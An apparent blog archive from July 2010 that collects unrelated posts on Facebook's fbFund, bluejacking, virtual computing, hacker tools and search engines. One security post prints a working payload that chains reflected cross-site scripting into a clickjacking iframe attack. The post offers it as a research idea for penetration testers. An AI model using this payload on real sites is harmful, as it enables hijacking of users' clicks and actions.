Archive for July, 2010


If you’re a software developer with a little ambition and a good idea, then Facebook may be the company that makes you a very wealthy person. The social networking site that began in 2004 as a way for college students to keep in touch has expanded to allow everyone to create their own Facebook page. Since then, Facebook has carved a niche for itself in the tech world as a company that is willing to break through the traditional barriers of business.

In May 2007, the company opened its platform, allowing software developers to add their programs to the Facebook site. This in turn allowed the site’s users to choose from a wide variety of programs and add them to their personal Facebook pages. To show that its platform is truly open, the company held f8, an eight-hour-long competition where developers created their own programs for Facebook’s interface. Eighty-five new programs — ranging from video sharing to a Scrabble offshoot — were added to Facebook as a result of f8.

Now, the company is taking its cultivation of new applications even further. In September 2007, Facebook founder Mark Zuckerberg announced the company has a $10 million pile of cash waiting for software developers who want to share their programs with Facebook. The company calls it the fbFund.

The grants range from $25,000 to $250,000, and a good idea could fatten a developer’s bank account. The company hasn’t announced any restrictions on the number of applications each developer can contribute, so potentially one developer could make a lot of money with a few applications. And while $250,000 isn’t anything to sneeze at, the fbFund grants are actually just the tip of the iceberg.

As it turns out, the company is interested in providing more than grants — it wants to serve as venture capitalists for the right application. Developers receiving grants from Facebook will not only get the initial cash, they will also maintain ownership of their programs. Facebook just wants first crack at providing the money needed to take the software and turn it into a viable start-up business.

It’s a basement software developer’s dream come true, and it’s no coincidence that the offer comes from a former basement software developer. Zuckerberg seems like Willy Wonka, having sent out the gold-wrapped candy bars and waiting patiently in his chocolate factory for the arrival of someone like Charlie.

Of course, Zuckerberg is probably not secretly planning on handing over the keys to Facebook’s front door. But with the fbFund, he has thrown out the traditional, frustrating search between venture capital and good ideas and simply put out notice of where the money can be found.

Facebook has attached only one stipulation to its fbFund: The company won’t consider applications from any developer or company that has already accepted venture capital from another source. This satisfies two dilemmas. It spreads venture capital around to those who have been overlooked — an example of infracaninophilia, or love for the underdog. The stipulation also keeps Facebook out of any sticky potential legal battles over who actually owns the software backed by Facebook’s capital.

For unknown developers with good ideas and drive, Facebook’s fbFund offer could prove to be a cash cow.

Have you ever been doorbell ditching before? The point of the prank is simple: Sneak up to someone’s front door, knock loudly or ring the doorbell, and, instead of greeting whoever answers the door, run away and hide somewhere nearby. The joy of doorbell ditching is, of course, reveling in the homeowner’s confusion and rolling with laughter under the security of his nicely trimmed bushes. Although the game might get you in a bit of trouble if you happen to incite the ire of a cranky neighbor, it’s mostly a harmless joke on par with a prank phone call.

For more technically inclined pranksters with access to Bluetooth technology, however, there’s the digital version of doorbell ditching and prank phone calls: Bluejacking. A kind of practical joke played out between Bluetooth

Bluetooth technology operates by using low-power radio waves, communicating on a frequency of 2.45 gigahertz. This special frequency is also known as the ISM band, an open, unlicensed band set aside for industrial, scientific and medical devices. When a number of Bluetooth devices are switched on in the same area, they all share the same ISM band and can locate and communicate with each other, much like a pair of walkie talkies tuned to the same frequency are able to link up.

Bluetooth technology users take advantage of this ability to network with other phones and can send text messages or electronic business cards to each other. To send information to another party, the user creates a personal contact name in his or her phone’s address book — the name can be anything from the sender’s actual name to a clever nickname.

Bluejackers have devised a simple technique to surprise their victims: Instead of creating a legitimate name in the address book, the bluejacker’s message takes the place of the name. The prank essentially erases the “from” part of the equation, allowing a user to send any sort of comment he wishes without indentifying himself.

For instance, if you’re sitting in a coffee shop and notice a fellow Bluetooth user sitting down to enjoy a cup of iced coffee, you could set up a contact under the name “Is your coffee cold enough?” After choosing to send the text via Bluetooth, the phone will search for other enabled Bluetooth devices; selecting one will send the unsolicited message to that device. A bluejacker’s crowning moment comes, of course, when the victim receives the message and expresses a mild mix of confusion and fear that he’s under surveillance.

Bluejacking is imprecise, however. Searching for other Bluetooth-enabled hardware might turn up a list of devices labeled with a series of numbers and letters. Unless the bluejacker’s target has chosen to publicly identify his or her phone, or it’s the only Bluetooth phone in the area, the bluejacker may have a hard time messaging his or her target on the first try.

Today, students and faculty can reserve and log in to the NCSU Virtual Computing Laboratory anytime, anywhere from their own PCs or laptops. What’s more, this remote-access system lets users choose the software they need, including industrial strength computer-assisted design (CAD) and engineering programs that take more memory than they have on their own systems. At the same time, professors can build customized software images in minutes for students to access anywhere. Virtual computing makes one computer act and perform like many computers.

Through virtual computing providers, users can download and use more than one operating system and perform a multitude of functions at the same time through a single mouse click and receive all the benefits of additional programs and hardware without having to purchase or install them on their own computer. Executives can check their company e-mail on the road, students can take classes from home and managers can keep up with documents stored on internal servers from anywhere in the world.

Virtual computing is increasing possibilities and performance in the world of information technology (IT): increased storage space, more software applications, performance and troubleshooting solutions, as well as data backup.

Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller amount, and typically requires some sort of login before you’re allowed to do it. Often times it’s protected by login too, so it’s a relatively small amount of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS. An attacker could do something like:

http://example.com/?search=<script>eval(location.hash.slice(1))</script>

This is an old trick that basically says anything that falls into the anchor tag is what the attacker wants to run as the attack. Anchor tags are not sent to the server, they are only seen on the client. So this effectively turns the reflected XSS into a DOM based XSS, which leaves less of a signature on the server as well, incidentally. Then the attacker’s anchor payload would look something like this (this works only in Firefox):

http://example.com/?search=<script>eval(location.hash.slice(1))</script>#a=document.body.appendChild(document.createElement(“iframe”));a.d=a.contentDocument;a.d.open().close();i=a.d.createElement(“iframe”);a.style.width=90;a.style.height=90;a.style.border=i.style.border=0;a.style.position=i.style.position=”absolute”;a.style.overflow=i.style.overflow=”hidden”;a.style.opacity=.3;i.style.width=100;i.style.height=100;i.style.left=-10;i.style.top=-10;i.src=”http://www.victim.com/&#8221;;a.d.body.appendChild(i);function followmouse(e){xcoord=ycoord=40;xcoord+=e.pageX-50;ycoord+=e.pageY-50;a.style.left=xcoord;a.style.top=ycoord;}document.onmousemove=followmouse;

So you have a reflected XSS on example.com that instantiates a DOM based XSS which instantiates a clickjacking attack against victim.com. Obviously you’d need to modify this to actually fit the right coordinates and work in other browsers, but this could easily be used to leverage the attack in situations where an attacker might not be able to otherwise. For instance, if the clickjacking defenses only care about the referrer and the referrer is on the correct domain just a different sub-domain, that could be used to bypass it – and so on. Anyway, I thought some people might think this is interesting. Happy penetration testing!

INTERNET HACKER TOOLS

Hackers are generally lazy but intelligent, which means they don’t like doing something boring that they can program the computer to do for them instead. As a result, hackers have unleashed a variety of tools designed to make their lives easier (but their victims’ lives more miserable). Some of these tools include scanners (to find open ports on vulnerable computers), remote Trojan horse programs (to take over a computer through the Internet), and password crackers (designed to exhaustively try out different password combinations until they finds one that works). To see what types of tools hackers may use against you, browse through the following:

AOHell

Released around 1995, AOHell  defined the standard for online harassment programs and quickly spawned numerous copycats for harassing other online services including CompuServe, Prodigy, and the Microsoft Network. Written in Visual Basic 3.0, AOHell was a relatively simple program that helped hackers send spoofed email, create phony credit card numbers for making fake AOL accounts, con AOL users out of passwords and credit card numbers, and send insulting messages to others in chat rooms.

AOHell, the first and original online harassment tool.
Although AOHell initially caused problems for America Online users, the program is now obsolete. Few hackers are currently developing AOHell copycat programs, preferring to channel their energy towards creating more sophisticated Internet hacking tools such as port scanners or harassment tools that cause chaos on IRC or in ICQ chat rooms.

BO2K – Back Orifice

With a name deliberately chosen to mock Microsoft’s Back Office program, Back Orifice caused a sensation when released in 1998 as one of the first remote access Trojan horse programs that could remotely control another computer over a phone line or through the Internet

Back Orifice 2000 is the latest incarnation of the popular and ground-breaking remote access Trojan horse.
Developed by a hacker group calling themselves the Cult of the Dead Cow, Back Orifice (http://www.bo2k.com) made headlines again in 1999 when it was released at DefCon 7.0 with improvements, including the option of adding plug-in programs written by others, and the complete C/C++ source code so that anyone could study and modify the program. Ironically when introduced at DefCon, the Back Orifice 2000 CD was infected by the Chernobyl (CIH) virus.

Although Back Orifice still poses a threat to computers, the buzz surrounding BO2K has faded. Still, the program has spawned numerous remote access copycats programs that have improved upon the original Back Orifice design, and despite its age, Back Orifice still remains a favorite tool for hackers to probe computers connected to cable or DSL modems.

Crack Whore

One of the new breed of website hacking programs, Crack Whore uses a brute force/dictionary attack against a website to find the password to a legitimate account . Since so many people use weak, easy to guess passwords, programs like Crack Whore are surprisingly successful far more often than they should be!!

Crack Whore probes a website for easily-guessed passwords to give a hacker access to a system.
Once hackers have access to a legitimate account, they can either modify web pages and other data directly or attempt to burrow through the system and either gain access to additional accounts or elevate the current account to get greater access to the rest of the computer hosting a particular website.

The wise man doesn’t give the right answers, he poses the right questions.

–CLAUDE LEVI-STRAUSS
THERE ARE TWO PROBLEMS WITH INFORMATION: NOT HAVING ENOUGH, AND HAVING TOO MUCH. WITHOUT ALL THE NECESSARY INFORMATION ABOUT A TOPIC, IT’S EASY TO MAKE A WRONG DECISION BASED ON AN INCOMPLETE PICTURE OF REALITY. Then again, having too much information can be just as bad, since finding the relevant facts about a topic can be time-consuming and tedious, which encourages people to make snap decisions based on perception rather than accuracy.

Trying to find just enough useful facts without being overwhelmed by too much irrelevant trivia can be a delicate balancing act. Still, if you want to make informed choices based on reason and information rather than on emotion and ignorance, you must take the time to research your topic thoroughly.

As a research tool, the Internet offers a wealth of information about virtually every topic. Unfortunately, the Internet poses a few problems of its own when it comes to research:

How do you find the information you need?

How do you know if the information you find is accurate, obsolete, misleading, or just plain wrong?

Finding information on the Internet is relatively easy: You just type one or more words into a search engine, and then the search engine lists all the websites (that it knows about) that contain the words or phrases you want to find.

The easy part is sifting through the different websites to find the information you need. The hard part is deciding whether you can trust what you find, knowing that every source of information selectively chooses which facts to report and which ones to omit. Because we all have a natural tendency to interpret facts based on personal biases and experience, don’t be surprised to find that one set of facts may cause you to reach a conclusion that’s completely different from what someone else might reach.

Sometimes there might be a right answer and sometimes there might be a wrong answer, but more often than not, there won’t be any one answer that’s either completely right or completely wrong. What you decide may be the right answer depends on your point of view.

The key to finding anything on the Internet is to use a search engine, but if you ask different search engines to find the same information, each one will find a number of websites not found by the others. Rather than limiting yourself to the tunnel vision of a single search engine, experiment with some of the different search engines listed below, and you may uncover information that your favorite search engine missed.

Even better, you may find that one search engine is better at finding certain types of data or offers a unique perspective to searching for information. For example, the Teoma search engine tries to cluster search results into subjects. So if you search for “Mustang,” the Teoma search engine clusters the results according to “Ford Mustang” and “Mustang horses.” The following list includes some of the more powerful search engines:

About
http://about.com

AlltheWeb
http://www.alltheweb.com

AltaVista
http://www.altavista.com

AOL Search
http://search.aol.com/

Ask Jeeves
http://www.askjeeves.com

Google
http://www.google.com

Hotbot
http://www.hotbot.com

LookSmart
http://www.looksmart.com

MSN
http://www.msn.com

Open Directory Project
http://dmoz.org

Teoma
http://www.teoma.com

Yahoo!
http://www.yahoo.com

Meta-search engines
Rather than visit multiple search engines yourself, you can save time by using a meta-search engine, which simultaneously sends your query to two or more general-purpose search engines and eliminates duplicate results. Here are some popular meta-search engines:

DogPile
http://www.dogpile.com

Mamma
http://www.mamma.com

MetaCrawler
http://www.metacrawler.com

Search.com
http://www.search.com

Specialized search engines
Finally, don’t ignore specialized search engines designed to search only for websites pertaining to a particular topic. Specialized search engines often find obscure web-sites that the larger search engines might overlook. There are specialized search engines for everything from caring for fish to the latest crafting fads. Here are a few interesting ones:

AvatarSearch Finds occult information about witchcraft, vampires, pagan rituals, astrology, tarot cards, and other topics that often panic right-wing conservatives (http://www.avatarsearch.com).

Black Web Portal Finds websites of particular interest to blacks (http://www.blackwebportal.com).

Crime Spider Searches for websites providing information about various crime and law enforcement sites and organized by topics such as serial murder, urban legends, and cybercrime (http://www.crimespider.com).

Disinformation Conspiracy theory-laden search engine that helps you uncover websites offering the “real truth” behind the pyramids of Mars, the sightings of black helicopters over America, film footage of Bigfoot, and the government secrets hidden in Area 51 (http://www.disinfo.com).

Education World Finds websites that can help students, teachers, and parents learn more about education (http://www.education-world.com).

Federal Web Locator Lists many of the websites from various government agencies and organizations (except for the really cool ones like the CIA and FBI). Maybe you can use it to find out where all your hard-earned tax dollars are going (http://www.infoctr.edu/fwl).

GovSearch Collection of government search engines for finding information about the U.S. government: IRS documents, Customs Service, NTIS, U.S. law code, legislative information, OSHA regulations, and information from many other agencies and departments (http://www.nwbuildnet.com/nwbn/govbot.html).

CopSeek Directory and Police Search Engine Helps you find websites related to law enforcement so you can find a policeman when you need one (http://www.copseek.com).

NerdWorld Search engine dedicated to computer and technology fanatics (http://www.nerdworld.com).

Que Pasa! A bilingual search engine geared towards Hispanics and Latinos, available in both English and Spanish (http://www.quepasa.com).

Satanist Net Search engine geared to helping you find satanic information on the Internet (http://www.satanist.net).

Women.com and WWWomen Two search engines geared toward helping women find information and resources on the Internet (http://www.women.com and http://www.wwwomen.com).

Kid-safe search engines
If you leave your children unsupervised, it’s likely that they’ll eventually find bomb-making instructions and pornography on the Internet. While keeping children isolated from such information may be impossible, you can at least limit their searching to kid-safe search engines. Unlike general-purpose search engines, kid-safe search engines won’t accidentally display links to pornographic or bomb-making websites. Try one of the following:

Ask Jeeves for Kids
http://www.ajkids.com

CleanSearch
http://www.cleansearch.com

Go.com
http://www.go.com

Yahooligans
http://www.yahooligans.com

Multimedia search engines
Most search engines help you find text, but what if you want to find a song, a picture, or a video clip? Rather than waste your time using a general purpose search engine to find an MP3 file of your favorite band, try using a special multimedia search engine instead. These multimedia search engines specialize in searching only for specific audio, graphic, or video files.

Here are some of the more popular multimedia search engines:

Ditto
http://www.ditto.com (see Figure 1-1)

FAST Multimedia Search
http://multimedia.alltheweb.com

SpeechBot.net
http://speechbot.research.compaq.com

MIDI Explorer
http://www.musicrobot.com

Search within categories
Many search engines, such as Yahoo!, display categories such as Computers & Internet or Business & Economy. If you click on a category and then use the search engine, you’ll have the option of searching the entire Internet or limiting your search to within the currently selected category. Obviously searching within a selected category will take less time and avoid a lot of irrelevant websites.

Still, you might like to search the entire Internet just for the surprise of seeing what the search engine might uncover that is not in your specific category.

Use specific words
If you want to find all websites that focus on birds, you could type the word “bird” into a search engine. Unfortunately, the search engine might return thousands of irrelevant websites that talk about badminton birdies or different ways to cook game birds. Instead of searching for general words, use more specific words such as “ornithology” (which is the branch of zoology dealing with birds). The more precise your search terms, the less likely the search engine will be to return irrelevant websites.

Use multiple words
You can also narrow your search by typing in multiple words. For example, if you wanted to find information about Miami, Florida, type in the two words “Miami” and “Florida.” If you just search for “Miami” or “Florida,” the search engine might bombard you with websites about the Miami Dolphins football team or the Florida Marlins baseball team. In general, the more words you search for, the more likely the search engine will find exactly what you want.

Use Boolean operators
Many search engines allow you to focus your search by using two different Boolean operators: AND and OR.

If you wanted to search for all websites that contain both the words “hot” and “dog,” you would simply type the following into the search field:

hot AND dog

This search would find websites devoted to hot dogs, but could also turn up websites that talk about ways to cool down a dog on a hot day.

If you wanted to search for all websites that contain either the word “hot” or “dog,” you would type the following into the search field:

hot OR dog

This could turn up websites that talk about hot dogs along with sites that mention dogs, different ways air conditioning can cool you down on a hot day, hot chili sauces, or dog food.

Be wary of what you find
The order that a search engine ranks websites can influence which ones people may visit, so to increase the odds that people will visit a specific website, some websites pay search engines to put them first (or at least near the top) of any list of related websites. The better search engines identify which websites paid for greater exposure, but other search engines may not be so honest.

Also, because search engines scan websites for keywords that people are most likely to search for, many websites hide multiple copies of the same keyword on their web pages. This tricks a search engine into thinking the website contains more information about a particular keyword than it really does.

As with reading newspapers, listening to the radio, or watching the news on television, always be wary of the source of your information. Search engines can find information for you, but they can’t verify the accuracy of the information. Anyone can put any information on a website.

No search engine will find everything available on the Internet, so be sure to use several search engines to find websites that other search engines might not have found. The more search engines you use, the more information you’ll find, and the more information you find, the more likely you’ll have most of the facts you need to make an intelligent decision.

Sometimes the hardest part about finding an answer is knowing how to look for it in the first place. With so many different search engines available at your fingertips, there’s no excuse for not finding the information you want on the Internet right away.

Email can form a long incriminating trail of evidence, so you should also delete your email regularly and shred your email message directories. Since this can be a nuisance, several companies have come up with self-destructing email. The idea is that after a certain amount of time, the email message either shreds itself (using a secure file-shredding method that can defeat ordinary undelete programs) or encrypts itself so it can’t be read after a certain date.

Omniva (http://www.disappearing.com) offers a unique self-destructing version of email. When you send a message to someone and run the Omniva Policy Manager program, you receive a unique encryption key from the Omniva Access server. Using this key, you can encrypt your message and send it out on the Internet. When someone wants to read your email, the email has to get the encryption key from the Omniva Access server, which opens the message.

However, once the expiration date of the message has passed, the Omniva Access server destroys the encryption key needed to open the message, effectively locking out anyone who tries to read the message ever again. In this case, the email isn’t physically destroyed, but is rendered useless.

Another company that offers self-destructing email is Infraworks (http://www.infraworks.com), which offers a program called InTether. The InTether program consists of a Receiver and a Packager. To send a file (text, video, audio, etc.), you encrypt it using the Packager program. To read, view, or hear the file, another person needs the Receiver program. After a specified date, or after someone opens the file a certain number of times, the Receiver package can delete and shred the file.